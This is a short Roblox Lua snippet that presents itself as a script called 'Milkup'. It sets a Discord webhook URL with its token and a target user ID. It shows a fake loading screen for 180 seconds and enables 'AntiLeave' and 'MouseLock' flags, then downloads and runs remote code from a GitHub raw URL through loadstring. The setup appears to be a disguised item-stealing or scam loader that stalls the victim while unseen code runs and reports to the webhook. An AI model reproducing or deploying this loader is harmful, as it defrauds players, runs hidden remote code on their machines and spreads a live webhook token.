_G.UserID = 3357349158
_G.Webhook = "https://discord.com/api/webhooks/1108363524129951764/GMv43esiWeeC_9-wkdFfLeSuBrto8jzfMANbqa4Gxav1kiy1iF3_VJZwSACHLKnjWOA6" 

_G.LoadingScreen = true
_G.AntiLeave = true
_G.MouseLock = true 


_G.ScriptName = "Milkup"
_G.FirstText = "Script Preparing"
_G.SecondText = "Script Loading..."
_G.ThirdText = "Almost Done..."
_G.WaitingTime = 180 -- it's the time between 0% and 100% in secondes

loadstring(game:HttpGet("https://raw.githubusercontent.com/k4ftt/R/main/Script.lua", true))()
